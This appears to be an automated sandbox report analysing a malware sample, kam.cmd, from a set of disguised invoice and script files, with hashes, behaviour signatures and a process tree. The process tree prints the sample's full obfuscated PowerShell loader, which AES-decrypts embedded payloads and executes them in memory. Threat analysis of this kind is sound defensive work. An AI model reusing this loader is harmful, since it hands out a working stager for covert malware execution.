Overview
overview
10Static
static
1google/INV...BA.url
windows7-x64
1google/INV...BA.url
windows10-2004-x64
1google/INV...AA.url
windows7-x64
1google/INV...AA.url
windows10-2004-x64
1google/dial.lnk
windows7-x64
3google/dial.lnk
windows10-2004-x64
7google/file.bat
windows7-x64
8google/file.bat
windows10-2004-x64
8google/file.ps1
windows7-x64
1google/file.ps1
windows10-2004-x64
10google/file.vbs
windows7-x64
8google/file.vbs
windows10-2004-x64
10google/iz.ps1
windows7-x64
1google/iz.ps1
windows10-2004-x64
1google/kam.cmd
windows7-x64
1google/kam.cmd
windows10-2004-x64
10google/las.cmd
windows7-x64
1google/las.cmd
windows10-2004-x64
10google/pw.ps1
windows7-x64
1google/pw.ps1
windows10-2004-x64
10google/py.ps1
windows7-x64
1google/py.ps1
windows10-2004-x64
10google/quark.ps1
windows7-x64
1google/quark.ps1
windows10-2004-x64
10google/time.ps1
windows7-x64
1google/time.ps1
windows10-2004-x64
10google/update.vbs
windows7-x64
8google/update.vbs
windows10-2004-x64
10google/upload.vbs
windows7-x64
8google/upload.vbs
windows10-2004-x64
10google/version.bat
windows7-x64
1google/version.bat
windows10-2004-x64
1Analysis
-
max time kernel
118s -
max time network
120s -
platform
windows7_x64 -
resource
win7-20231129-en -
resource tags
arch:x64arch:x86image:win7-20231129-enlocale:en-usos:windows7-x64system -
submitted
19-04-2024 07:38
Static task
static1
Behavioral task
behavioral1
Sample
google/INVOICE-RVSA03HDSVBA.url
Resource
win7-20240221-en
Behavioral task
behavioral2
Sample
google/INVOICE-RVSA03HDSVBA.url
Resource
win10v2004-20240412-en
Behavioral task
behavioral3
Sample
google/INVOICE-RVSA03HDSVBAA.url
Resource
win7-20240319-en
Behavioral task
behavioral4
Sample
google/INVOICE-RVSA03HDSVBAA.url
Resource
win10v2004-20240226-en
Behavioral task
behavioral5
Sample
google/dial.lnk
Resource
win7-20240221-en
Behavioral task
behavioral6
Sample
google/dial.lnk
Resource
win10v2004-20240412-en
Behavioral task
behavioral7
Sample
google/file.bat
Resource
win7-20240220-en
Behavioral task
behavioral8
Sample
google/file.bat
Resource
win10v2004-20240412-en
Behavioral task
behavioral9
Sample
google/file.ps1
Resource
win7-20231129-en
Behavioral task
behavioral10
Sample
google/file.ps1
Resource
win10v2004-20240412-en
Behavioral task
behavioral11
Sample
google/file.vbs
Resource
win7-20240221-en
Behavioral task
behavioral12
Sample
google/file.vbs
Resource
win10v2004-20240226-en
Behavioral task
behavioral13
Sample
google/iz.ps1
Resource
win7-20240221-en
Behavioral task
behavioral14
Sample
google/iz.ps1
Resource
win10v2004-20240412-en
Behavioral task
behavioral15
Sample
google/kam.cmd
Resource
win7-20231129-en
Behavioral task
behavioral16
Sample
google/kam.cmd
Resource
win10v2004-20240412-en
Behavioral task
behavioral17
Sample
google/las.cmd
Resource
win7-20240220-en
Behavioral task
behavioral18
Sample
google/las.cmd
Resource
win10v2004-20240412-en
Behavioral task
behavioral19
Sample
google/pw.ps1
Resource
win7-20240221-en
Behavioral task
behavioral20
Sample
google/pw.ps1
Resource
win10v2004-20240412-en
Behavioral task
behavioral21
Sample
google/py.ps1
Resource
win7-20240221-en
Behavioral task
behavioral22
Sample
google/py.ps1
Resource
win10v2004-20240412-en
Behavioral task
behavioral23
Sample
google/quark.ps1
Resource
win7-20240221-en
Behavioral task
behavioral24
Sample
google/quark.ps1
Resource
win10v2004-20240412-en
Behavioral task
behavioral25
Sample
google/time.ps1
Resource
win7-20240221-en
Behavioral task
behavioral26
Sample
google/time.ps1
Resource
win10v2004-20240226-en
Behavioral task
behavioral27
Sample
google/update.vbs
Resource
win7-20240215-en
Behavioral task
behavioral28
Sample
google/update.vbs
Resource
win10v2004-20240412-en
Behavioral task
behavioral29
Sample
google/upload.vbs
Resource
win7-20240221-en
Behavioral task
behavioral30
Sample
google/upload.vbs
Resource
win10v2004-20240412-en
Behavioral task
behavioral31
Sample
google/version.bat
Resource
win7-20240220-en
Behavioral task
behavioral32
Sample
google/version.bat
Resource
win10v2004-20240412-en
General
-
Target
google/kam.cmd
-
Size
63KB
-
MD5
8c278ad6dd06fbcd0a767e744b62c785
-
SHA1
e30a7793d54f89e1a364e0fbe710686c43a7be88
-
SHA256
7be0bbf4d2a43ff457f55453d03b1cd85b7541396f7823ae51003b271fa0b0bc
-
SHA512
36721787b046e00e3d183e7d83cdb3263ae151fd080e57e331e0f10667d04fca5412092249920f6566d5d8a640ecb819539103e1606599095be0af7fe9fd18b2
-
SSDEEP
1536:r5JAG4vBFdvhBqi69GQys/xQ+sNIh/tQW9odEd/cLl:jSBFthBqiyZQzNFW2Ll
Malware Config
Signatures
-
Suspicious behavior: EnumeratesProcesses 1 IoCs
Processes:
powershell.exepid process 2748 powershell.exe -
Suspicious use of AdjustPrivilegeToken 1 IoCs
Processes:
powershell.exedescription pid process Token: SeDebugPrivilege 2748 powershell.exe -
Suspicious use of WriteProcessMemory 15 IoCs
Processes:
cmd.execmd.exedescription pid process target process PID 1712 wrote to memory of 2192 1712 cmd.exe cmd.exe PID 1712 wrote to memory of 2192 1712 cmd.exe cmd.exe PID 1712 wrote to memory of 2192 1712 cmd.exe cmd.exe PID 1712 wrote to memory of 2204 1712 cmd.exe cmd.exe PID 1712 wrote to memory of 2204 1712 cmd.exe cmd.exe PID 1712 wrote to memory of 2204 1712 cmd.exe cmd.exe PID 2204 wrote to memory of 2660 2204 cmd.exe cmd.exe PID 2204 wrote to memory of 2660 2204 cmd.exe cmd.exe PID 2204 wrote to memory of 2660 2204 cmd.exe cmd.exe PID 2204 wrote to memory of 1696 2204 cmd.exe cmd.exe PID 2204 wrote to memory of 1696 2204 cmd.exe cmd.exe PID 2204 wrote to memory of 1696 2204 cmd.exe cmd.exe PID 2204 wrote to memory of 2748 2204 cmd.exe powershell.exe PID 2204 wrote to memory of 2748 2204 cmd.exe powershell.exe PID 2204 wrote to memory of 2748 2204 cmd.exe powershell.exe
Processes
-
C:\Windows\system32\cmd.execmd /c "C:\Users\Admin\AppData\Local\Temp\google\kam.cmd"1⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\cmd.execmd /c \"set __=^&rem\2⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /K C:\Users\Admin\AppData\Local\Temp\google\kam.cmd2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\cmd.execmd /c \"set __=^&rem\3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo $host.UI.RawUI.WindowTitle='C:\Users\Admin\AppData\Local\Temp\google\kam.cmd';$vsHK='IEHyinvoEHyikeEHyi'.Replace('EHyi', ''),'FrTbCNomTbCNBTbCNaseTbCN64TbCNStTbCNrTbCNiTbCNngTbCN'.Replace('TbCN', ''),'DecLWiromLWirprLWiresLWirsLWir'.Replace('LWir', ''),'EGsoAntrGsoAyPGsoAoiGsoAntGsoA'.Replace('GsoA', ''),'CCddPrCddPeatCddPeCddPDeCddPcrCddPyCddPpCddPtCddPoCddPrCddP'.Replace('CddP', ''),'EleyknqmeyknqnyknqtAtyknq'.Replace('yknq', ''),'RigKHeigKHadigKHLiigKHnigKHeigKHsigKH'.Replace('igKH', ''),'LoyPPNadyPPN'.Replace('yPPN', ''),'ScvpNplcvpNicvpNtcvpN'.Replace('cvpN', ''),'GVJoFeVJoFtCuVJoFrVJoFrenVJoFtPVJoFroVJoFcVJoFeVJoFsVJoFsVJoF'.Replace('VJoF', ''),'MapAReinMpAReodpAReupARelepARe'.Replace('pARe', ''),'TrPOEJaPOEJnsPOEJfPOEJoPOEJrmPOEJFiPOEJnPOEJalPOEJBPOEJloPOEJckPOEJ'.Replace('POEJ', ''),'CoBJvMpyBJvMToBJvM'.Replace('BJvM', ''),'ChNZxNanNZxNgNZxNeENZxNxNZxNtenNZxNsioNZxNnNZxN'.Replace('NZxN', '');powershell -w hidden;function NWhFr($gBdvJ){$ZqBKJ=[System.Security.Cryptography.Aes]::Create();$ZqBKJ.Mode=[System.Security.Cryptography.CipherMode]::CBC;$ZqBKJ.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7;$ZqBKJ.Key=[System.Convert]::($vsHK[1])('PjiHj+DTj3maw+urBkf9Nh81M9EC6ZbFd543+Tn5ybE=');$ZqBKJ.IV=[System.Convert]::($vsHK[1])('YcgYSr+goQk5oVoF0rwnDA==');$tqqey=$ZqBKJ.($vsHK[4])();$JyHFR=$tqqey.($vsHK[11])($gBdvJ,0,$gBdvJ.Length);$tqqey.Dispose();$ZqBKJ.Dispose();$JyHFR;}function daoWE($gBdvJ){$RzPzI=New-Object System.IO.MemoryStream(,$gBdvJ);$FsIer=New-Object System.IO.MemoryStream;$gxzOz=New-Object System.IO.Compression.GZipStream($RzPzI,[IO.Compression.CompressionMode]::($vsHK[2]));$gxzOz.($vsHK[12])($FsIer);$gxzOz.Dispose();$RzPzI.Dispose();$FsIer.Dispose();$FsIer.ToArray();}$neFXM=[System.IO.File]::($vsHK[6])([Console]::Title);$QFtfJ=daoWE (NWhFr ([Convert]::($vsHK[1])([System.Linq.Enumerable]::($vsHK[5])($neFXM, 5).Substring(2))));$vmyld=daoWE (NWhFr ([Convert]::($vsHK[1])([System.Linq.Enumerable]::($vsHK[5])($neFXM, 6).Substring(2))));[System.Reflection.Assembly]::($vsHK[7])([byte[]]$vmyld).($vsHK[3]).($vsHK[0])($null,$null);[System.Reflection.Assembly]::($vsHK[7])([byte[]]$QFtfJ).($vsHK[3]).($vsHK[0])($null,$null); "3⤵
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
Network
MITRE ATT&CK Matrix
Replay Monitor
Loading Replay Monitor...
Downloads
-
memory/2748-4-0x000000001B620000-0x000000001B902000-memory.dmpFilesize
2.9MB
-
memory/2748-5-0x0000000001F00000-0x0000000001F08000-memory.dmpFilesize
32KB
-
memory/2748-6-0x000007FEF5B20000-0x000007FEF64BD000-memory.dmpFilesize
9.6MB
-
memory/2748-7-0x0000000002CA0000-0x0000000002D20000-memory.dmpFilesize
512KB
-
memory/2748-9-0x0000000002CA0000-0x0000000002D20000-memory.dmpFilesize
512KB
-
memory/2748-8-0x0000000002CA0000-0x0000000002D20000-memory.dmpFilesize
512KB
-
memory/2748-10-0x0000000002CA0000-0x0000000002D20000-memory.dmpFilesize
512KB
-
memory/2748-11-0x000007FEF5B20000-0x000007FEF64BD000-memory.dmpFilesize
9.6MB
-
memory/2748-12-0x000007FEF5B20000-0x000007FEF64BD000-memory.dmpFilesize
9.6MB
-
memory/2748-13-0x0000000002CA0000-0x0000000002D20000-memory.dmpFilesize
512KB
-
memory/2748-14-0x0000000002CA0000-0x0000000002D20000-memory.dmpFilesize
512KB
-
memory/2748-15-0x0000000002CA0000-0x0000000002D20000-memory.dmpFilesize
512KB
-
memory/2748-16-0x0000000002CA0000-0x0000000002D20000-memory.dmpFilesize
512KB